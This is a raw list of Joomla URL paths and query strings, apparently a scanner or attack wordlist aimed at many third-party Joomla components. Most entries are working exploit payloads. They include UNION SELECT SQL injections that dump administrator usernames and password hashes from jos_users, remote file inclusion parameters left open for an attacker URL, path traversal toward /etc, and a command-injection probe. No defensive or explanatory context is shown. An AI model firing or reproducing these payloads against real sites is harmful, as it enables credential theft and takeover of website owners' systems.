/index.php?option=com_user&view=reset&layout=confirm
/administrator/
/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
/includes/joomla.php|/includes/joomla.php?includepath=
/libraries/joomla/utilities/compat/php50x.php|/libraries/joomla/utilities/compat/php50x.php
/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
/components/com_search/index.php?option=com_search&Itemid=1&searchword=%22%3Becho%20md5(911)%3B
/index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=1
/index.php?option=com_content&view=%' +'a'='a&id=25&Itemid=28
/index.php?option=com_content&view=archive
/index.php?option=com_poll&task=results&id=14&mosmsg=DOS@HERE<<>AAA<><>
/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='2
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=
/index.php?option=com_resman&task=moreinfo&id=-1+UNION+SELECT+111,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),333+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=
/index.php?option=com_profile&Itemid=42&task=&task=viewoffer&oid=9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
/index.php?option=com_facileforms&Itemid=640&user_id=107&catid=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
/index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1+UNION+SELECT+0,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
/components/com_hashcash/server.php?mosConfig_absolute_path=
/components/com_zoom/classes/fs_unix.php
/components/com_zoom/includes/database.php
/administrator/components/com_serverstat/install.serverstat.php
/components/com_fm/fm.install.php
/administrator/components/com_mambelfish/mambelfish.class.php
/components/com_lmo/lmo.php
/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php
/components/com_cpg/cpg.php
/components/com_moodle/moodle.php
/components/com_extended_registration/registration_detailed.inc.php
/components/com_mospray/scripts/admin.php
/components/com_reporter/processor/reporter.sql.php
/components/com_madeira/img.php
/components/com_jd-wiki/lib/tpl/default/main.php
/components/com_bsq_sitestats/external/rssfeed.php
/com_bsq_sitestats/external/rssfeed.php
/components/com_mp3_allopass/allopass.php
/com_joomla_flash_uploader/install.joomla_flash_uploader.php
/component/com_onlineflashquiz/quiz/common/db_config.inc.php
/components/com_facileforms/facileforms.frame.php?ff_compath=
/components/com_rssxt/rssxt.php?mosConfig_absolute_path=
/index.php?option=com_football&task=viewteam&teamID=-1+union+select+null,null,3,4,5,6,concat (username,0x3a,password),8+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
/index.php?option=com_productshowcase&Itemid=1&action=details&id=-99999+UNION+SELECT+0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0,0,0,0,1,1,1,1,2,3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
/index.php?option=com_candle&task=content&cID=-9999+UNION+SELECT+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
/index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
/components/com_astatspro/refer.php?id=-1+UNION+SELECT+0,1,concat(username,0x3a,password,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- 
/index.php?option=com_comprofiler&task=userProfile&user=1+and+1=2
/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
/components/com_forum/download.php?phpbb_root_path=
/components/minibb/index.php?absolute_path=
/components/com_moodle/moodle.php?mosConfig_absolute_path=
/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
/index.php?option=com_flippingbook&Itemid=28&book_id=999+UNION+SELECT+null,concat(username,0x3e,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
/index.php?option=com_joomlaxplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc
/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=
/index.php?option=com_actualite&task=edit&id=-1+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8,9+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
/index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1+UNION+SELECT+0,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
/components/com_madeira/img.php?url=
/components/com_mmp/help.mmp.php?mosConfig_absolute_path=
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=
/components/com_mospray/scripts/admin.php?basedir=
/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
/components/com_jim/install.jim.php?mosConfig_absolute_path=
/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=
/index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=+UNION+SELECT+1,2,3,4,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=
/index.php?option=com_contact&Itemid=1
/components/com_uhp/uhp_config.php?mosConfig_absolute_path=
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=
/components/com_smf/smf.php?mosConfig_absolute_path=
/components/com_peoplebook/param.peplebook.php?mosConfig_absolute_path=
/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=
/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=
/components/com_jreactions/|/components/com_jreactions/langset.php?comPath=
/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=
/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=
/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=
/index.php?view=videos&type=member&user_id=
/index.php?option=com_jinc&view=messages&newsid=1
/index.php?option=com_jbudgetsmagic&view=mybudget&bid=
/index.php?option=com_surveymanager&task=editsurvey&stype=-2+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+jos_users--
/index.php?option=com_jreservation&task=propertycpanel&pid=
/index.php?option=com_album&Itemid=128&target=/../..
/index.php?option=com_foobla_suggestions&controller=comment&idea_id=
/components/com_hbssearch/longDesc.php?h_id=1&id=-2%20union%20select%20concat%28username,0x3a,password%29%20from%20jos_users--
/index.php?option=com_category&task=loadCategory&catid*=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users--
/index.php?option=com_agora&task=
/index.php?option=com_news&id=-148+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users--
/?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1
/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+from+jos_users--&Itemid=54
/index.php?option=com_bookjoomlas&Itemid=26&func=comment&gbid=-1 UNION ALL SELECT 1,2,NULL,4,NULL,6,7,NULL,9,CONCAT(username,0x3a,password),11,12,13,14,15,16 FROM jos_users
index.php?option=com_spidercalendar&Itemid=14&date=[SQL Blind]
/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1
/components/com_moofaq/includes/file_includer.php?gzip=0&file=
/index.php/dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=[SQLi]
/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=1[sql]
/index.php?option=com_virtuemart&view=user&task=removeAddressST&virtuemart_userinfo_id=[sql]